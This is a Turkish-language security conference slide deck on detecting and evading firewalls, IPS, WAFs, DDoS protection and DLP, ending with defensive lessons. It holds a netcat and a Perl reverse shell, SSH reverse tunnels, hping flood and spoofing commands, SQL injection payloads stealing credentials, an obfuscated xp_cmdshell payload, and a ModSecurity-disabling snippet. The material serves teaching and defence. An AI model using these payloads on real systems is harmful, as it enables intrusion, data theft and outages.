SlideShare a Scribd company logo
1 of 47
Download to read offline
Güvenlik Sistemlerini Atlatma
ve
Alınacak Dersler
Huzeyfe ÖNAL
honal@bga.com.tr
www.bga.com.tr
www.guvenlikegitimleri.com
Huzeyfe ÖNAL
• Ağ güvenliği uzmanı
– Network pentest
– Alternatif ağ güvenliği sistemleri
– DDoS Engelleme Sistemleri/IPS

• Bilgi güvenliği eğitmeni
– Bilgi Güvenliği AKADEMİSİ

• Güvenlik dünyasının gazetecisi
– www.lifeoverip.net
Amaç
• Bilgi güvenliğinin dinamik bir alan olduğu ve takçalıştır hazır sunulan çözümlerin gerçek manada
güvenliğimizi arttırmadığının uygulamalı olarak
gösterilmesi.

• Bu sunumda anlatılan tüm olaylar kişisel sektör
tecrübelerimden oluşmaktadır.
Ajanda
• Güvenlik sistemleri çeşitleri
– Firewall
– IPS
– WAF
– DOS/DDoS engelleme sistemleri
– N-DLP
– ...

• Klasik güvenlik anlayışımız ve eksiklikleri
• Güvenlik sistemlerinin çalışma yapıları ve nasıl
atlatılabileceği
Klasik Güvenlik Anlayışı
• Tümden savunma!
• Ürün temelli bir güvenlik anlayışı
– Ürün= sihirbaz bakış açısı(bilgi-sayar)

• Türkiye’ye özel değil tüm dünya için geçerli
• Teknik sorunlar teknik yollarla çözülür, insani
sorunlar insanla çözülür
• Temel bilgi sahibi olmadan ileri seviye işler
yapmaya çalışma
– TCP/IP bilmeden Firewall/IPS yönetmek
Güvenlik Sistemleri
• Günümüz sınır güvenliği sistemleri
– Güvenlik Duvarı(Firewall)
– Saldırı Tespit ve Engelleme Sistemi(IDS/IPS)
– Web Uygulama Güvenlik Duvarı(WAF)
– DDoS Engelleme Sistemi
– Veri Sızma Engelleme(DLP)
– ...
Güvenlik Duvarları
• Ağlar arası erişim kontrolü
• IP adresine göre port numarasına göre engelleme
yapabilir
• 192.168.1.2 ANY TCP Port 80
• 192.168.9.0/24 ANY UDP 53
• Bazı Firewalllar L7(içeriği göre de engelleme
yapabilir)
Güvenlik Duvarları Nasıl Engelleme
Yapar?
• Güvenlik Duvarları genelde iki tip engelleme
yöntemi kullanır
– DROP
– REJECT

• DROP: Gelen/giden paketi engelle ve geriye
herhangi bir mesaj dönme
• REJECT:Gelen/giden paketi engelle ve geriye TCP
RST/UDP Port Ulaşılamaz gibi bir mesaj dön
Güvenlik Duvarı Keşif Çalışmaları
• TCP RFC’e göre bir porta SYN bayraklı paket
gönderildiğinde
– ACK-SYN döner
– RST döner
– Cevap dönmezse?

• Herhangi üç porta gönderilecek TCP paketleriyle
Firewall var/yok anlaşılabilir
• Çeşitli TCP portlara yönelik tcptraceroute
çalışmaları
• #nmap firewall_ip adresi
Firewall İle Korunan Sistem

Yanlış Yapılandırma(?)
Firewall İle Korunmayan Sistem
Güvenlik Duvarları Nasıl Aşılır?
• Güvenlik duvarları paketlerin içeriğine bakmaz(L7
firewallar hariç)
• Tünelleme yöntemleriyle güvenlik duvarları
rahatlıkla aşılabilir
• Bir port, bir protokol açıksa tüm portlar ve
protokoller açıktır ilkesi!
• Internetten indirilecek kurulum gerektirmeyen
basit araçlar kullanılarak tüm Firewall’lar
aşılabilir(?)
• Çalışanların %25’i Güvenlik duvarlarını aşarak
işlem yapmaktadır
Firewall Atlatma:SSH Tünelleme
• Genelikle güvenlik duvarlarında kullanıcılara
80/443. portlara erişime hak verilmiştir
• Internette 443. porttan SSH çalıştıran çeşitli
ücretsiz SSH servisi veren sistemler bulunmaktadır
• SSH Socks proxy desteğine sahiptir
• #ssh –D hedef.sistem.com –p 443 –l huzeyfe
Firewall Atlatma:Ultrasurf
• Ultrasurf: Antisansür programı
• Engellemesi en zor yazılımlardan
• Kurulum gerektirmez, IP adresi engelleyerek
engellenemez…
Firewall Atlatma:Ultrasurf-II
Firewall Atlatma :OpenVPN
• OpenVPN: UDP ve TCP üzerinden istenilen portda
çalıştırılabilen SSL VPN uygulaması
• Evdeki bilgisayara OpenVPN kurup dışarı 53 UDP
ve TCP/443(HTTPS) bağlantıları açılır
•
Tüm trafik UDP/53 üzerinden
akacaktır!
Firewall Atlatma:SSL
Firewall Atlatma:SSL-II
Firewall Atlatma:Ters Tünelleme
• Teamviewer mantığı!
Ters Tünelleme Örnekleri
• ssh -NR 5000:localhost:22
huzeyfe@evbilgisayari.com –p 443
• Huzeyfe’nin ev bilgisayarının 5000. portu
yereldeki SSH portuna tünellenmiş durumda
• Netcat Reverse Tunnel
– netcat -e /bin/bash www.evbilgisayarim.com 443
– Evbilgisayarim~#nc –l –p 443
Perl ile Ters Tünelleme
• #!/usr/bin/perl use Socket;
$addr=sockaddr_in('3333',inet_aton('localhost'));
socket(S,PF_INET,SOCK_STREAM,getprotobyname
('tcp')); connect(S,$addr);select S;$|=1;
while(defined($l=<S>)){print qx($l);} close(S);
L7 Firewall
• Uygulama katmanında işlem yapar
– Paketlerin sadece ip ve port bileşenlerine değil
içeriğine de bakar
– İçerisinde /etc/passwd geçiyorsa engelle gibi!

#iptables –A INPUT –p tcp –dport 80 –m string –algo
bm –string /etc/passwd –j REJECT
gibi
L7 Firewall Atlatma
• SSL kullanılarak L7 firewallar atlatılabilir
• Çeşitli encoding teknikleri kullanılarak L7
firewallar atlatılabilir
• Çeşitli ip parçalama teknikleri kullanılarak L7
firewallar atlatılabilir
Saldırı Engelleme Sistemleri(IPS)
• İkinci nesil güvenlik sistemleri
– Firewall & IDS -> IPS & WAF

• Pakete ait tüm alanları(L2-L7 arası)
iceleyip karar verebilir
• DROP TCP ANY 80 URICONTENT cmd.exe
• Drop tcp any any -> 192.168.1.0/24 80 (content: "cgibin/phf"; offset: 3; depth: 22; msg: "CGI-PHF attack";)
• Temelde iki farklı amaç için tercih edilir
– İçerden dışarı yapılabilecek saldırılarda/istenmeyen
trafiklerde
– Dışardan gelebilecek saldırılarda
IPS Keşif Çalışması
• Bilinen tüm IPS’lerde default olarak gelen imzalar
denenerek aktif bir IPS var mı yok mu anlaşılabilir
• %99 açık olan ve IPS’i tetikleyecek imzalar
– Cmd.exe
– ../../
– /etc/passwd

• HTTP isteklerinde bu değerler gönderilerek dönen
cevap incelenir
– Klasik 404 vs gibi HTTP cevabı dönüyorsa IPS yok(ya da
imzalar aktif değil)
– Connection RST veya Timeout alınıyorsa IPS Vardır.

• IPS yokken ne cevap döner, varken ne cevap döner
Örnek
• telnet www.checkpoint.com 80
• telnet www.tippingpoint.com 80
• telnet www.cia.gov 80
IPS Atlatma Teknikleri-I
• IP parçalama
• Encoding
• Protokole özel atlatma
yöntemleri
• Google –> IPS evasion …
IPS Atlatma Teknikleri-II
• SSL üzerinden paket gönderimi
Türkiye’de Efektif IPS Kullanım Oranı
• Nasıl gerçekleştirildi?
• Nc(netcat), Nssl araçları kullanıldı
• Önce HTTP üzerinden sonra HTTPS üzerinden
aşağıdaki istekler gönderildi
• GET ../../etc/passwd HTTP/1.0
• GET ../../cmd.exe HTTP/1.0
•
İç Kullanıcıların IPS Atlatması
• Tünelleme yöntemleri
– ICMP Tunelleme
– DNS Protokol Tunelleme
– HTTP In Smtp tunelleme
– HTTP/HTTPS Tunelleme

• WebTunnel
WebTunnel ile Firewall/IPS Atlatma
#perl wtc.pl tcp://localhost:8080 tcp://vpn.lifeoverip.net:22
http://www.siberguvenlik.org/cgi-bin/wts.pl

huzeyfe@seclab:~$ ssh localhost -p 8080

Sunucu Logları
DDoS Engelleme Sistemleri
• DOS/DDoS Saldırılarını Engelleme Amaçlı
Geliştirilmiştir
• Genellikle istatistiksel veri analizine dayanır
• Karantina/Rate limiting/Threshold özelliği
elzemdir!
• Dikkatli ayarlanmamış bir DDoS engelleme sistemi
tersine bir amaç için kullanılır
– 2Mb ile 2Gb lik internet hattının durdurulması!
DDoS Sistemi Keşif ÇAlışması
•
•
•
•
•

%100 garantili keşif yöntemi değildir
Amaç rate limiting özelliğinin varlığını anlama
Hping –S –p 80 –flood 1.2.3.4
Hping –udp –p 53 –flood 1.2.3.4
İlgili portlara erişim sağlanamıyorsa muhtemelen
bir ddos engelleme sistemi sizi karantinaya
almıştır.
Örnek Iptables Kuralları
• iptables -A INPUT –p tcp –dport 80 -m limit --limit
50/s --limit-burst 30 –j REJECT
• 10 dakikada max 10 bağlantı
#iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP -sport 513:65535 --dport 22 -m state --state
NEW,ESTABLISHED -m recent --set -j ACCEPT
#iptables -I INPUT -p tcp --dport 22 -m state --state
NEW -m recent --update --seconds 600 --hitcount
11 -j DROP
Hping ile Özel Paket Üretimi
• Mikrosaniye =saniyenin 100.000’de biri
• Saniyede 10 paket göndermek için
– #hping -i u10000 -S -p 22 www.hedefsite.com –a
istenilen_ip_adresi

• Saniyede 100 adet paket gönderimi
– #hping -S -p 22 192.168.2.23 -c 1000 -i u100
Web Uygulama Güvenlik Duvarı
• Web uygulamalarına spesifik güvenlik duvarı
• Sadece port/ip değil tüm paket içeriğine(HTTP, HTTPS
vs) bakarak işlem yapılır
• WAF arkasında çalıştırılan uygulama sisteme ne kadar
iyi tanıtılırsa o oranda başarı sağlanır
• Ağ tabanlı IPS’lerden daha fazla koruma sağlar!
• Değişik yerleşim/çalışma modelleri vardır
– Inline
– Reverse Proxy
– Passive(Active Response)
WAF Keşif Çalışması
• Wafw00f
• Xss denemeleri vs
WAF Atlatma
• Genellikle WAF’lar SSL çözümleme yaptığı için SSL
üzerinden atlatma işe yaramaz
• WAF’ların çıkışından itibaren çeşitli atlatma
teknikleri geliştirilmiştir
• /*!12345 select * from */
• Reverse_exec
• http splitting
WAF Atlatma:SQL Yorumları
• /* comment */ yorum satırı olarak algılanır(SQL
+WAF+IPS tarafından)
• /*!sql-code*/ ve /*!12345sql-code*/ yorum
olarak algılanmaz(SQL tarafından)(WAF+IPS’ler
tarafından yorum olarak algılanır)

• /?id=1/*!limit+0+union+select+concat_ws(0x3a,u
sername,password,email)+from+users*/
WAF Atlatma:Encoding

Inline çalışan WAF/IPS’lerde işe yarar
WAF Atlatma:Reverse Fonksiyonu
• SQL Sunucularda bulunan reverse fonksiyonu kullanılır
– Reverse(lqs) = sql

• var=1';DECLARE @a varchar(200) DECLARE @b
varchar(200) DECLARE @c varchar(200) SET @a = REVERSE
('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam')
EXEC (@a) RECONFIGURE SET @b = REVERSE
('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a)
RECONFIGURE SET @c =REVERSE('“08.911.39.19 gnip"
llehsdmc_px') EXEC (@c);-• REVERSE('“08.911.39.19 gnip" llehsdmc_px')= ping
91.93.119.80
WAF Atlatma:ModSecurity(Yerel)
• www kullanıcısının yazma izni varsa hackerin ilk
yapacağı işlerden biri Modsecurity WAF’ı devre
dışı bırakmak olacaktır.
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Ağ Tabanlı DLP Sistemleri
• IDS/IPS mantığında çalışır
• Şifreli trafiği inceleyemez
• Ultrasurf, Gmail vs gibi SSL üzerinden hizmet
veren servislerle atlatmak kolaydır
Korunma
•
•
•
•

Eğitim şart!
Ürünler sihirbaz değildir!
Güvenlik bir süreçtir!
Güvenlik bir lüks değil gereksinimdir!
Teşekkürler…
Huzeyfe ÖNAL
Bilgi Güvenliği AKADEMİSİ
honal@bga.com.tr
http://www.bga.com.tr
NetSec Ağ ve Bilgi Güvenliği Topluluğu
http://www.lifeoverip.net/netsec-listesi/

More Related Content

What's hot

Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıBGA Cyber Security
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriBGA Cyber Security
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Zararlı Yazılım Analizi ve Tespitinde YARA Kullanımı
Zararlı Yazılım Analizi ve Tespitinde YARA KullanımıZararlı Yazılım Analizi ve Tespitinde YARA Kullanımı
Zararlı Yazılım Analizi ve Tespitinde YARA KullanımıBGA Cyber Security
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ BGA Cyber Security
 
Siber Tehdit Avcılığı (Threat Hunting)
Siber Tehdit Avcılığı (Threat Hunting)Siber Tehdit Avcılığı (Threat Hunting)
Siber Tehdit Avcılığı (Threat Hunting)BGA Cyber Security
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarBGA Cyber Security
 
Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiSparta Bilişim
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Murat KARA
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziBGA Cyber Security
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12BGA Cyber Security
 
Saldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiSaldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiOğuzcan Pamuk
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Mehmet Ince
 

What's hot (20)

Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
 
Web Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma TestleriWeb Servislerine Yönelik Sızma Testleri
Web Servislerine Yönelik Sızma Testleri
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Zararlı Yazılım Analizi ve Tespitinde YARA Kullanımı
Zararlı Yazılım Analizi ve Tespitinde YARA KullanımıZararlı Yazılım Analizi ve Tespitinde YARA Kullanımı
Zararlı Yazılım Analizi ve Tespitinde YARA Kullanımı
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
 
Siber Tehdit Avcılığı (Threat Hunting)
Siber Tehdit Avcılığı (Threat Hunting)Siber Tehdit Avcılığı (Threat Hunting)
Siber Tehdit Avcılığı (Threat Hunting)
 
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
Kablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan SaldırılarKablosuz Ağlara Yapılan Saldırılar
Kablosuz Ağlara Yapılan Saldırılar
 
Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı Tespiti
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı Simülasyonu
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
 
Saldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiSaldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log Yönetimi
 
Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101Web Uygulama Güvenliği 101
Web Uygulama Güvenliği 101
 

Viewers also liked

Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriBGA Cyber Security
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriBGA Cyber Security
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECSosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECBGA Cyber Security
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri BGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yollarınetsec
 
Adli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta SistemiAdli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta SistemiBGA Cyber Security
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriBGA Cyber Security
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugayFuat Ulugay, CISSP
 
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiDDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiBGA Cyber Security
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiBGA Cyber Security
 
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriDoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBGA Cyber Security
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıBGA Cyber Security
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat UlugayFuat Ulugay, CISSP
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriBGA Cyber Security
 

Viewers also liked (20)

Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği Temelleri
 
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve ÇeşitleriTemel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
Temel Kavramlar, DoS/DDoS Saldırıları ve Çeşitleri
 
Web Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liğiWeb Uygulama Güven(siz)liği
Web Uygulama Güven(siz)liği
 
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSECSosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
Sosyal Medyada Anonim Hesaplar Nasıl Tespit Edilir? - NETSEC
 
Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri Gerçek Dünyadan Siber Saldırı Örnekleri
Gerçek Dünyadan Siber Saldırı Örnekleri
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
DDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma YollarıDDOS Saldırıları ve Korunma Yolları
DDOS Saldırıları ve Korunma Yolları
 
BGA Eğitim Sunum
BGA Eğitim SunumBGA Eğitim Sunum
BGA Eğitim Sunum
 
Adli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta SistemiAdli Bilişim Açısından E-posta Sistemi
Adli Bilişim Açısından E-posta Sistemi
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
 
Sizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat UlugaySizma testine giris - Fuat Ulugay
Sizma testine giris - Fuat Ulugay
 
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM GüvenliğiDDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
DDoS Saldırıları ve Korunma Yöntemleri ile E-posta ve ATM Güvenliği
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router Eğitimi
 
Kablosuz Ağlarda Güvenlik
Kablosuz Ağlarda GüvenlikKablosuz Ağlarda Güvenlik
Kablosuz Ağlarda Güvenlik
 
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma YöntemleriDoS ve DDoS Saldırıları ve Korunma Yöntemleri
DoS ve DDoS Saldırıları ve Korunma Yöntemleri
 
10 Adımda Sızma Testleri
10 Adımda Sızma Testleri10 Adımda Sızma Testleri
10 Adımda Sızma Testleri
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
SynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma YollarıSynFlood DDOS Saldırıları ve Korunma Yolları
SynFlood DDOS Saldırıları ve Korunma Yolları
 
Sızma Testine Giriş - Fuat Ulugay
Sızma Testine Giriş  - Fuat UlugaySızma Testine Giriş  - Fuat Ulugay
Sızma Testine Giriş - Fuat Ulugay
 
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma YöntemleriAdli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
Adli Bilişim Açısından DoS ve DDoS Saldırıları ve Korunma Yöntemleri
 

Similar to Güvenlik Sistemlerini Atlatma ve Alınacak Dersler

Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriEPICROUTERS
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux Burak Oğuz
 
Defansif Dünyaya Ofansif Dokunuş - SpookFlare
Defansif Dünyaya Ofansif Dokunuş - SpookFlareDefansif Dünyaya Ofansif Dokunuş - SpookFlare
Defansif Dünyaya Ofansif Dokunuş - SpookFlareHalil Dalabasmaz
 
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBaşarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru Entegrasyonu
Başarılı Bir Savunma İçin Güvenlik Ürünlerinin Doğru EntegrasyonuBGA Cyber Security
 
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)
BGA SOME/SOC Etkinliği - APT Tehditlerine Karşı 7/24 Güvenlik İzlemesi (SOC)BGA Cyber Security
 
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliğiBilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliğiEPICROUTERS
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiKurtuluş Karasu
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...BGA Cyber Security
 
Açık Kaynak Sistemlerle Siber Saldırı Gözlemleme Sistemi Kurulum ve Yönetimi
